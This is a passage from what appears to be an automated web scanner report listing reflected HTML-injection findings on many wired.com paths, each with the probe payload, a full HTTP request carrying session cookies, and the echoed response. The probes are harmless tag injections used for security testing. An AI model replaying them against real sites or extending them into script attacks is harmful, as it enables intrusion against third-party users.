1.120. http://www.wired.com/entertainment/music/news/2004/04/63263 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /entertainment/music/news/2004/04/63263

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4db81"><a>8eb418e94bf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /entertainment/music4db81"><a>8eb418e94bf/news/2004/04/63263 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29361
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:17:21 GMT
Date: Sun, 21 Nov 2010 23:07:21 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_entertainment ss_music4db81"><a>8eb418e94bf c_news">
...[SNIP]...

1.121. http://www.wired.com/entertainment/music/news/2004/04/63263 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /entertainment/music/news/2004/04/63263

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70d39"><a>b304160c724 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /entertainment/music/news70d39"><a>b304160c724/2004/04/63263 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29361
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:17:36 GMT
Date: Sun, 21 Nov 2010 23:07:36 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_entertainment ss_music c_news70d39"><a>b304160c724">
...[SNIP]...

1.122. http://www.wired.com/entertainment/music/news/2005/07/68124 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /entertainment/music/news/2005/07/68124

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f72e"><a>b56d3b0469f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /entertainment8f72e"><a>b56d3b0469f/music/news/2005/07/68124 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29361
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:17:29 GMT
Date: Sun, 21 Nov 2010 23:07:29 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_entertainment8f72e"><a>b56d3b0469f ss_music c_news">
...[SNIP]...

1.123. http://www.wired.com/entertainment/music/news/2005/07/68124 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /entertainment/music/news/2005/07/68124

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8292"><a>527abd9bf12 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /entertainment/musicd8292"><a>527abd9bf12/news/2005/07/68124 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29361
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:18:02 GMT
Date: Sun, 21 Nov 2010 23:08:02 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_entertainment ss_musicd8292"><a>527abd9bf12 c_news">
...[SNIP]...

1.124. http://www.wired.com/entertainment/music/news/2005/07/68124 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /entertainment/music/news/2005/07/68124

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 794ab"><a>79fd2601542 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /entertainment/music/news794ab"><a>79fd2601542/2005/07/68124 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29361
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:18:22 GMT
Date: Sun, 21 Nov 2010 23:08:22 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_entertainment ss_music c_news794ab"><a>79fd2601542">
...[SNIP]...

1.125. http://www.wired.com/entertainment/theweb [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /entertainment/theweb

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e0dc"><a>6d583e3f06 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /entertainment7e0dc"><a>6d583e3f06/theweb HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29335
Vary: Accept-Encoding
Cache-Control: max-age=219
Expires: Sun, 21 Nov 2010 23:11:12 GMT
Date: Sun, 21 Nov 2010 23:07:33 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_entertainment7e0dc"><a>6d583e3f06 ss_theweb">
...[SNIP]...

1.126. http://www.wired.com/entertainment/theweb [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /entertainment/theweb

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52ebb"><a>01d211d6eae was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /entertainment/theweb52ebb"><a>01d211d6eae HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29337
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:18:02 GMT
Date: Sun, 21 Nov 2010 23:08:02 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_entertainment ss_theweb52ebb"><a>01d211d6eae">
...[SNIP]...

1.127. http://www.wired.com/gadgets [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /gadgets

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24f0b"><a>06f0bc5b429 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /gadgets24f0b"><a>06f0bc5b429 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29331
Vary: Accept-Encoding
Cache-Control: max-age=225
Expires: Mon, 22 Nov 2010 01:14:33 GMT
Date: Mon, 22 Nov 2010 01:10:48 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_gadgets24f0b"><a>06f0bc5b429">
...[SNIP]...

1.128. http://www.wired.com/gadgets/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /gadgets/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d3c4"><a>44e9ad792ff was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /gadgets5d3c4"><a>44e9ad792ff/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29332
Vary: Accept-Encoding
Cache-Control: max-age=224
Expires: Sun, 21 Nov 2010 20:17:08 GMT
Date: Sun, 21 Nov 2010 20:13:24 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_gadgets5d3c4"><a>44e9ad792ff">
...[SNIP]...

1.129. http://www.wired.com/gadgets/digitalcameras [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /gadgets/digitalcameras

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20f24"><a>01629cf0b9a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /gadgets20f24"><a>01629cf0b9a/digitalcameras HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29364
Vary: Accept-Encoding
Cache-Control: max-age=233
Expires: Sun, 21 Nov 2010 23:11:26 GMT
Date: Sun, 21 Nov 2010 23:07:33 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_gadgets20f24"><a>01629cf0b9a ss_digitalcameras">
...[SNIP]...

1.130. http://www.wired.com/gadgets/digitalcameras [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /gadgets/digitalcameras

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb0fc"><a>827ec64b19b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /gadgets/digitalcamerascb0fc"><a>827ec64b19b HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29364
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:17:57 GMT
Date: Sun, 21 Nov 2010 23:07:57 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_gadgets ss_digitalcamerascb0fc"><a>827ec64b19b">
...[SNIP]...

1.131. http://www.wired.com/gadgets/displays [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /gadgets/displays

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4bfac"><a>5cabf0c5d32 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /gadgets4bfac"><a>5cabf0c5d32/displays HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29352
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Sun, 21 Nov 2010 23:11:43 GMT
Date: Sun, 21 Nov 2010 23:07:43 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_gadgets4bfac"><a>5cabf0c5d32 ss_displays">
...[SNIP]...

1.132. http://www.wired.com/gadgets/displays [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /gadgets/displays

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db025"><a>555d174deea was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /gadgets/displaysdb025"><a>555d174deea HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29352
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:18:07 GMT
Date: Sun, 21 Nov 2010 23:08:07 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_gadgets ss_displaysdb025"><a>555d174deea">
...[SNIP]...

1.133. http://www.wired.com/gadgets/gadgetreviews [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /gadgets/gadgetreviews

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dba86"><a>e8f52bb4221 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /gadgetsdba86"><a>e8f52bb4221/gadgetreviews HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29362
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Sun, 21 Nov 2010 23:11:57 GMT
Date: Sun, 21 Nov 2010 23:07:57 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_gadgetsdba86"><a>e8f52bb4221 ss_gadgetreviews">
...[SNIP]...

1.134. http://www.wired.com/gadgets/gadgetreviews [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /gadgets/gadgetreviews

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e399"><a>cebb494f95a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /gadgets/gadgetreviews1e399"><a>cebb494f95a HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29362
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:18:32 GMT
Date: Sun, 21 Nov 2010 23:08:32 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_gadgets ss_gadgetreviews1e399"><a>cebb494f95a">
...[SNIP]...

1.135. http://www.wired.com/gadgets/mac [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /gadgets/mac

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8d93"><a>5fa7d6b4d51 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /gadgetsa8d93"><a>5fa7d6b4d51/mac HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29342
Vary: Accept-Encoding
Cache-Control: max-age=219
Expires: Sun, 21 Nov 2010 23:11:41 GMT
Date: Sun, 21 Nov 2010 23:08:02 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_gadgetsa8d93"><a>5fa7d6b4d51 ss_mac">
...[SNIP]...

1.136. http://www.wired.com/gadgets/mac [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /gadgets/mac

Issue detail

